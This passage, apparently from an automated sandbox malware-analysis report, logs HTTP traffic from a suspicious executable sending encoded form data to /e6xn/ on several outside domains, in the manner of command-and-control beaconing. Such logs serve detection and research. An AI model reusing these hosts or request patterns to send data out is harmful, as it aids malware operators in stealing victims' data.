6d 6e 46 4e 36 50 77 50 32 57 52 67 53 47 62 66 32 6c 7a 38 45 74 47 51 65 47 64 44 61 51 4a 7a 75 61 78 36 64 34 36 6e 59 4b 6b 78 69 30 4a 78 47 67 39 51 6b 72 33 2b 41 49 6c 70 78 53 43 52 58 52 50 36 36 4f 32 59 55 31 79 4b 67 61 79 34 35 4c 62 71 68 6a 69 75 33 33 6b 32 38 50 62 49 47 6b 75 6c 31 70 34 44 4e 53 4f 52 71 6e 59 44 43 56 76 2b 55 4d 64 4c 48 39 68 2f 52 48 56 30 51 71 37 66 78 45 42 6e 74 2f 48 46 58 67 57 7a 77 54 62 75 71 50 46 47 64 37 49 48 72 36 64 52 54 4c 4a 72 49 78 57 57 44 4b 68 52 39 39 49 75 4b 47 74 2b 50 62 41 66 77 50 74 56 48 73 34 56 38 39 49 36 4f 79 50 75 6c 61 49 4f 73 66 52 39 36 4f 53 68 78 4f 78 36 5a 44 59 73 57 6a 54 6f 74 59 45 58 31 4d 52 71 4d 41 41 51 34 46 52 73 78 4e 77 32 4e 69 57 72 51 74 4e 46 4d 79 44 64 73 32 59 64 4f 54 32 33 4f 72 45 58 5a 69 33 58 6a 68 51 3d
                                                                                  Data Ascii: bvOt=XiKSAmDxjpGxDAWUnTl5Yb5JKTmKqLm8zZyV4EpLFSGaQEH4R/aLnu4iuXR1FFwAPNUjxzrZlxOXgUmJwHELs5OtQLfU2tKsbtyAQFgczyQS2/1XrHb8CiTK1YXgbKNLWfdMQ2h2/Z4fB/dmy8ZFLr6tJ0wtehBA1xqfN+XwKlaxh/J1UsvlHCcDMQiOIa/L29+E/uCI4Goxa3y2snUjIlZuwriD41aqpqzgTTgeAxy2Wiajp8LvmFPxpldFdTav4ioDs5hIrJ/+NXlbYRQ7ONvUvndbM/QksqEt/+sbM1x1bOCii//SwBXzHKqbdmcOgBHtTSQ0vX44b1Pb7Lbq98b6tVTfqLwuuAH2m4DHU6IFX2UdhI3y/iN0M/JiyI8bdHDjTniB6xUQKPZKI7mgfg9k5tlhzj2jOrY491BJRqlNDcAUPWDURbm/Xv96vk4ecew/pxBgEiHqTCrPxOhTcj/H3Y+BArexztt5QT4ubqVH1JxPSsHU+VgBTaRkjMOXB627Nhq/vLkIaK5lbjlKbr5qUZvrJnBuac1bjvDMgztNqzb9sg546c42QUq2cFR7msjJuY6HkBklx3sdkjFPzkHUJMR9CMv5WbDvdqHOIuecvIm+3+VuEdqLxM4EHBHHvQLYDbWLL+qeJqaBJOZd6IMUYa/cIAYrL7rgnOWg9xEGdaupT9vnK4cNTvORVNVGWzmX1kP25ccTCJiSvNb71plrGUhKchCqJ6UGEvq0IS7/biZgoEXEe97TbuWDarrrYMXe0QhNpY5QlaEFTRxfbspoDJh1I+hrJO2vxv5WFatg0Zd4LPXb/9kfw7rUoonNoaafSChKRnWrPPciY45hFLYdTjDDk9QdnWGNhiSycVbsI7gVqZ2V78/DGHpdVD7fUhi81n4bFytkjQ+Olk1fnkJLHsPDNlJcenGmxrLpS6hMKtPo4eRomnFN6PwP2WRgSGbf2lz8EtGQeGdDaQJzuax6d46nYKkxi0JxGg9Qkr3+AIlpxSCRXRP66O2YU1yKgay45Lbqhjiu33k28PbIGkul1p4DNSORqnYDCVv+UMdLH9h/RHV0Qq7fxEBnt/HFXgWzwTbuqPFGd7IHr6dRTLJrIxWWDKhR99IuKGt+PbAfwPtVHs4V89I6OyPulaIOsfR96OShxOx6ZDYsWjTotYEX1MRqMAAQ4FRsxNw2NiWrQtNFMyDds2YdOT23OrEXZi3XjhQ=
                                                                                  Mar 18, 2024 14:47:56.722050905 CET214INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:56 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.1049744192.64.119.184806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:59.248907089 CET501OUTGET /e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:59.372061968 CET322INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 67
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx
                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 70 61 72 6b 69 6e 67 70 61 67 65 2e 6e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 27 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                  Data Ascii: <a href='http://parkingpage.namecheap.com'>Moved Permanently</a>.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.104974587.236.19.107806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:05.006690979 CET769OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.pro-ecoproduct.com
                                                                                  Referer: http://www.pro-ecoproduct.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 6e 68 6a 36 6b 77 68 42 45 57 6a 68 74 70 68 53 4f 4e 54 41 75 75 64 41 63 64 2b 6f 6e 46 62 78 2f 59 48 56 51 58 61 6a 58 56 4d 4f 4c 48 6b 2f 72 52 65 62 68 42 32 51 36 4b 6f 31 30 32 75 4a 56 47 6c 75 63 72 4a 54 69 6c 6b 78 57 4c 6b 6b 50 69 52 4e 62 33 71 4a 37 31 70 79 32 59 34 56 69 64 68 68 5a 7a 32 78 64 33 54 6c 74 55 50 38 74 73 48 6a 45 2f 67 78 66 6e 6d 37 6d 41 51 75 46 39 72 56 70 52 37 67 32 4c 67 39 49 7a 44 61 38 6e 6c 67 39 6a 66 51 46 35 41 73 68 31 77 32 66 7a 31 33 41 78 77 2f 53 52 2f 52 5a 39 45 64 4b 6f 4c 49 39 34 62 5a 34 4c 72 2b
                                                                                  Data Ascii: bvOt=nhj6kwhBEWjhtphSONTAuudAcd+onFbx/YHVQXajXVMOLHk/rRebhB2Q6Ko102uJVGlucrJTilkxWLkkPiRNb3qJ71py2Y4VidhhZz2xd3TltUP8tsHjE/gxfnm7mAQuF9rVpR7g2Lg9IzDa8nlg9jfQF5Ash1w2fz13Axw/SR/RZ9EdKoLI94bZ4Lr+
                                                                                  Mar 18, 2024 14:48:05.263274908 CET481INHTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:05 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c ee a6 4e e2 10 45 82 b5 13 93 ca a8 20 3d ec 98 35 9e 52 69 6b 4a 92 52 f8 f7 a4 9d 90 b8 d8 7a f6 e7 a7 67 7e 97 bf 6d e5 b1 2a e0 45 be 96 50 d5 cf e5 7e 0b 8b 25 e2 be 90 3b c4 5c e6 b7 cd 9a a5 88 c5 61 21 12 6e c2 f5 22 b8 21 a5 a3 08 6d b8 90 c8 d2 0c 0e 36 c0 ce 0e 9d e6 78 1b 26 1c 67 88 9f ac fe 99 ee 56 e2 1f 13 55 c2 7b 21 0d 81 a3 cf 81 7c 20 0d f5 7b 09 a3 f2 d0 45 ee 3c 71 60 3b 08 a6 f5 e0 c9 7d 91 63 1c fb c9 c9 c5 a2 b4 76 e4 bd 78 ea 55 63 08 d7 2c 63 9b 0d dc d7 5d fb fd 00 1f 33 0e 2a c0 38 8e ac 77 76 49 8d 8d 4d 0f 4d 60 8d bd 42 65 5d 80 c7 94 e3 9f 4d 4c 3b e7 8c c9 a6 ff 92 5f 9e 74 ec 98 1a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ecMAO0f'8,NE =5RikJRzg~m*EP~%;\a!n"!m6x&gVU{!| {E<q`;}cvxUc,c]3*8wvIMM`Be]ML;_t0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.104974687.236.19.107806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:07.754864931 CET793OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.pro-ecoproduct.com
                                                                                  Referer: http://www.pro-ecoproduct.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 6e 68 6a 36 6b 77 68 42 45 57 6a 68 73 4a 52 53 4c 75 37 41 35 65 64 48 41 4e 2b 6f 38 31 62 31 2f 59 4c 56 51 57 4f 4a 58 47 34 4f 4c 6c 38 2f 71 53 47 62 67 42 32 51 79 71 6f 77 36 57 75 38 56 47 68 63 63 76 4a 54 69 6c 77 78 57 4c 30 6b 50 54 52 4f 42 48 71 50 79 56 70 77 34 34 34 56 69 64 68 68 5a 7a 53 58 64 33 62 6c 74 67 4c 38 72 4e 48 6b 62 50 67 77 65 6e 6d 37 69 41 51 71 46 39 71 41 70 56 36 6f 32 4e 6b 39 49 33 4c 61 79 57 6c 6a 7a 6a 65 62 59 70 42 6d 71 47 5a 34 5a 42 78 77 45 51 59 2b 44 51 69 7a 58 38 6c 61 62 35 71 66 75 50 48 58 32 4e 65 55 70 30 64 64 46 35 50 43 67 63 52 7a 6d 38 39 56 4b 4a 68 55 61 41 3d 3d
                                                                                  Data Ascii: bvOt=nhj6kwhBEWjhsJRSLu7A5edHAN+o81b1/YLVQWOJXG4OLl8/qSGbgB2Qyqow6Wu8VGhccvJTilwxWL0kPTROBHqPyVpw444VidhhZzSXd3bltgL8rNHkbPgwenm7iAQqF9qApV6o2Nk9I3LayWljzjebYpBmqGZ4ZBxwEQY+DQizX8lab5qfuPHX2NeUp0ddF5PCgcRzm89VKJhUaA==
                                                                                  Mar 18, 2024 14:48:08.011814117 CET481INHTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:07 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c ee a6 4e e2 10 45 82 b5 13 93 ca a8 20 3d ec 98 35 9e 52 69 6b 4a 92 52 f8 f7 a4 9d 90 b8 d8 7a f6 e7 a7 67 7e 97 bf 6d e5 b1 2a e0 45 be 96 50 d5 cf e5 7e 0b 8b 25 e2 be 90 3b c4 5c e6 b7 cd 9a a5 88 c5 61 21 12 6e c2 f5 22 b8 21 a5 a3 08 6d b8 90 c8 d2 0c 0e 36 c0 ce 0e 9d e6 78 1b 26 1c 67 88 9f ac fe 99 ee 56 e2 1f 13 55 c2 7b 21 0d 81 a3 cf 81 7c 20 0d f5 7b 09 a3 f2 d0 45 ee 3c 71 60 3b 08 a6 f5 e0 c9 7d 91 63 1c fb c9 c9 c5 a2 b4 76 e4 bd 78 ea 55 63 08 d7 2c 63 9b 0d dc d7 5d fb fd 00 1f 33 0e 2a c0 38 8e ac 77 76 49 8d 8d 4d 0f 4d 60 8d bd 42 65 5d 80 c7 94 e3 9f 4d 4c 3b e7 8c c9 a6 ff 92 5f 9e 74 ec 98 1a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ecMAO0f'8,NE =5RikJRzg~m*EP~%;\a!n"!m6x&gVU{!| {E<q`;}cvxUc,c]3*8wvIMM`Be]ML;_t0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.104974787.236.19.107806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:10.499604940 CET1806OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.pro-ecoproduct.com
                                                                                  Referer: http://www.pro-ecoproduct.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 6e 68 6a 36 6b 77 68 42 45 57 6a 68 73 4a 52 53 4c 75 37 41 35 65 64 48 41 4e 2b 6f 38 31 62 31 2f 59 4c 56 51 57 4f 4a 58 47 67 4f 4c 55 63 2f 73 7a 47 62 36 42 32 51 34 4b 6f 78 36 57 75 6c 56 43 4e 59 63 76 4e 74 69 6e 49 78 45 39 34 6b 65 33 39 4f 50 33 71 50 2f 31 70 39 32 59 34 45 69 63 4d 6d 5a 7a 43 58 64 33 62 6c 74 6d 6e 38 72 63 48 6b 64 50 67 78 66 6e 6d 2f 6d 41 51 4f 46 38 4f 51 70 56 33 4b 32 64 45 39 49 57 33 61 2b 45 39 6a 37 6a 65 5a 5a 70 41 7a 71 47 46 7a 5a 42 74 4b 45 51 63 55 44 58 6d 7a 57 61 59 45 47 71 44 47 31 73 6e 39 6f 4d 48 30 6c 78 35 49 48 36 32 43 30 63 78 6e 78 63 55 46 44 71 55 59 4d 4f 78 58 70 42 33 67 4a 78 33 34 33 4d 41 58 64 64 51 38 6c 6b 63 68 71 63 6c 58 59 48 67 77 32 4a 6c 54 43 65 62 6d 53 64 33 56 6d 52 53 54 4c 35 50 6b 5a 56 70 31 79 50 31 4b 75 65 59 6f 73 76 72 43 69 4c 77 4b 45 38 36 64 6a 4d 2b 50 48 47 44 62 55 44 76 47 6e 6f 76 30 57 70 4b 2f 6d 57 34 44 38 51 70 42 79 66 61 4b 77 72 77 50 54 35 48 45 4a 6f 35 68 62 72 57 4e 6a 74 33 51 72 58 52 4f 63 67 45 6d 58 46 4c 49 38 47 6d 57 66 37 67 49 77 44 34 33 35 36 75 71 32 68 35 65 72 61 50 59 47 4c 44 30 77 76 54 35 70 4a 4c 48 37 5a 79 4f 70 4b 47 2b 34 6a 2f 77 4e 70 2f 45 37 56 55 4a 73 33 4c 65 4d 6d 75 48 51 62 56 37 6d 38 50 42 30 51 70 39 6f 56 56 75 72 42 77 6d 39 68 54 7a 79 4b 30 41 33 4d 77 76 4a 6a 74 58 59 41 73 75 77 70 5a 50 51 6e 73 6e 46 30 41 72 49 47 31 62 56 50 57 36 61 57 55 5a 68 32 58 6b 70 7a 56 77 57 70 78 66 79 51 59 4e 51 47 69 6b 57 6f 4b 69 51 64 64 56 55 72 78 66 6f 46 67 36 4c 42 46 38 4b 63 36 76 66 77 68 70 38 30 65 74 43 43 4a 6e 47 78 39 38 31 63 6b 46 34 4b 79 31 70 39 71 77 38 4f 33 47 30 38 66 58 67 56 67 57 70 69 75 7a 69 53 63 47 59 6b 38 4e 72 76 55 43 69 79 71 45 73 56 71 52 57 74 4e 79 6e 71 72 76 67 65 2b 71 2b 6f 72 2f 4f 57 2f 4d 55 34 53 54 4d 6a 2f 31 2b 35 2f 53 4b 30 71 53 58 68 50 75 74 4a 6e 4e 66 4e 6d 57 53 39 6d 4f 6a 31 71 6c 59 6f 7a 32 34 6f 6f 46 74 32 4a 75 6c 77 6c 36 2f 44 2f 6d 6c 52 65 78 57 77 46 54 44 46 6f 47 45 46 4f 59 41 4f 67 4f 58 61 4e 55 42 30 52 32 65 77 4a 4f 7a 56 4b 33 2f 57 7a 68 31 52 6d 6c 6f 65 4b 36 72 38 47 68 49 34 58 67 37 62 6a 6a 66 74 67 38 58 64 6d 41 4b 79 66 56 38 46 6a 4c 54 34 56 4c 57 36 69 68 68 76 2b 37 59 79 75 59 66 50 6a 34 75 39 6a 58 6c 39 6c 72 53 75 42 53 30 50 52 64 41 34 64 61 61 4f 33 75 7a 69 6e 67 74 44 74 6c 68 57 65 37 73 77 45 71 47 79 58 79 38 50 6e 78 4d 78 4c 78 6e 31 76 65 68 56 6c 66 51 70 6d 54 65 4a 78 77 2b 2f 30 76 6f 79 6b 66 33 33 61 46 48 6d 76 73 7a 32 59 66 53 30 65 54 66 4d 56 32 6b 54 45 39 71 4a 6d 4d 43 67 4d 45 69 78 43 32 46 53 72 38 39 52 4e 46 30 2f 48 56 49 50 59 39 41 75 55 50 70 44 6f 6d 79 68 4c 2f 4e 77 78 51 76 76 67 46 30 31 4d 41 64 37 52 41 49 30 4d 48 7a 61 54 48 66 59 34 59 69 4a 70 63 46 69 6a 67 72 67 6a 6e 4b 4a 75 45 70 47 6b 70 4e 6d 72 30 48 36 4c 6a 6f 63 4c 66 34 65 79 79 54 52 4b 47 37 4d 76 79 46 77 67 6a 41 47 46 45 59 55 59 57 6e 53 75 4f 45 6e 54 6f 42 72 75 37 32 74 78 37 6d 44 31 73 36 65 63 47 30 63 70 62 74 78 79 54 31 4f 59 6b 71 55 51 59 56 43 6a 31 6d 6d 38 30 35 4e 55 68 48 2f 56 55 4f 34 5a 79 74 65 4f 45 6f 78 44 48 66 73 4d 2b 63 6e 31 4c 65 58 36 42 35 45 44 6c 38 44 75 75 6c 57 58 78 66 34 50 51 39 43 70 31 59 58 51 46 76 76 79 2b 65 52 6e 32 51 63 36 4b 68 6b 57 52 68 6d 4b 45 72 34 39 30 57 38 64 61 52 6a 70 78 75 6b 77 2b 38 37 4d 56 57 52 50 54 6a 64 30 55 4e 63 4e 43 71 75 2b 63 61 43 62 58 62 4e 64 66 76 4c 2f 73 6e 75 2f 76 34 57 49 47 45 4f 72 46 73 6f 62 56 42 51 35 4c 35 2b 54 38 77 33 53 68 48 4b 2f 51 37 74 54 67 30 2f 6b 6c 70 66 48 78 37 75 70 73 56 44 2f 30 54 5a 43 7a 61 4c 54 7a 2b 74 38 6b 53 32 30 7a 51 73 45 3d
                                                                                  Data Ascii: bvOt=nhj6kwhBEWjhsJRSLu7A5edHAN+o81b1/YLVQWOJXGgOLUc/szGb6B2Q4Kox6WulVCNYcvNtinIxE94ke39OP3qP/1p92Y4EicMmZzCXd3bltmn8rcHkdPgxfnm/mAQOF8OQpV3K2dE9IW3a+E9j7jeZZpAzqGFzZBtKEQcUDXmzWaYEGqDG1sn9oMH0lx5IH62C0cxnxcUFDqUYMOxXpB3gJx343MAXddQ8lkchqclXYHgw2JlTCebmSd3VmRSTL5PkZVp1yP1KueYosvrCiLwKE86djM+PHGDbUDvGnov0WpK/mW4D8QpByfaKwrwPT5HEJo5hbrWNjt3QrXROcgEmXFLI8GmWf7gIwD4356uq2h5eraPYGLD0wvT5pJLH7ZyOpKG+4j/wNp/E7VUJs3LeMmuHQbV7m8PB0Qp9oVVurBwm9hTzyK0A3MwvJjtXYAsuwpZPQnsnF0ArIG1bVPW6aWUZh2XkpzVwWpxfyQYNQGikWoKiQddVUrxfoFg6LBF8Kc6vfwhp80etCCJnGx981ckF4Ky1p9qw8O3G08fXgVgWpiuziScGYk8NrvUCiyqEsVqRWtNynqrvge+q+or/OW/MU4STMj/1+5/SK0qSXhPutJnNfNmWS9mOj1qlYoz24ooFt2Julwl6/D/mlRexWwFTDFoGEFOYAOgOXaNUB0R2ewJOzVK3/Wzh1RmloeK6r8GhI4Xg7bjjftg8XdmAKyfV8FjLT4VLW6ihhv+7YyuYfPj4u9jXl9lrSuBS0PRdA4daaO3uzingtDtlhWe7swEqGyXy8PnxMxLxn1vehVlfQpmTeJxw+/0voykf33aFHmvsz2YfS0eTfMV2kTE9qJmMCgMEixC2FSr89RNF0/HVIPY9AuUPpDomyhL/NwxQvvgF01MAd7RAI0MHzaTHfY4YiJpcFijgrgjnKJuEpGkpNmr0H6LjocLf4eyyTRKG7MvyFwgjAGFEYUYWnSuOEnToBru72tx7mD1s6ecG0cpbtxyT1OYkqUQYVCj1mm805NUhH/VUO4ZyteOEoxDHfsM+cn1LeX6B5EDl8DuulWXxf4PQ9Cp1YXQFvvy+eRn2Qc6KhkWRhmKEr490W8daRjpxukw+87MVWRPTjd0UNcNCqu+caCbXbNdfvL/snu/v4WIGEOrFsobVBQ5L5+T8w3ShHK/Q7tTg0/klpfHx7upsVD/0TZCzaLTz+t8kS20zQsE=
                                                                                  Mar 18, 2024 14:48:10.757514954 CET481INHTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:10 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c ee a6 4e e2 10 45 82 b5 13 93 ca a8 20 3d ec 98 35 9e 52 69 6b 4a 92 52 f8 f7 a4 9d 90 b8 d8 7a f6 e7 a7 67 7e 97 bf 6d e5 b1 2a e0 45 be 96 50 d5 cf e5 7e 0b 8b 25 e2 be 90 3b c4 5c e6 b7 cd 9a a5 88 c5 61 21 12 6e c2 f5 22 b8 21 a5 a3 08 6d b8 90 c8 d2 0c 0e 36 c0 ce 0e 9d e6 78 1b 26 1c 67 88 9f ac fe 99 ee 56 e2 1f 13 55 c2 7b 21 0d 81 a3 cf 81 7c 20 0d f5 7b 09 a3 f2 d0 45 ee 3c 71 60 3b 08 a6 f5 e0 c9 7d 91 63 1c fb c9 c9 c5 a2 b4 76 e4 bd 78 ea 55 63 08 d7 2c 63 9b 0d dc d7 5d fb fd 00 1f 33 0e 2a c0 38 8e ac 77 76 49 8d 8d 4d 0f 4d 60 8d bd 42 65 5d 80 c7 94 e3 9f 4d 4c 3b e7 8c c9 a6 ff 92 5f 9e 74 ec 98 1a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ecMAO0f'8,NE =5RikJRzg~m*EP~%;\a!n"!m6x&gVU{!| {E<q`;}cvxUc,c]3*8wvIMM`Be]ML;_t0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.104974887.236.19.107806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:14.519923925 CET504OUTGET /e6xn/?bvOt=qjLanAtLSG+g6YhcGMXKobFEDsC37gbqnajlfmukJF4TH11e5HWV02203YM0+S2fdiE5dYRNrz4LXrhHAApVOWSTzQMTxIdRoLo0SBW6YGOyo1TtwQ==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:48:14.775660992 CET485INHTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:14 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 72 6f 2d 65 63 6f 70 72 6f 64 75 63 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.pro-ecoproduct.com Port 80</address></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.1049749154.7.21.55806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:48:20.193871975 CET775OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.supportstuiwords.com
                                                                                  Referer: http://www.supportstuiwords.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
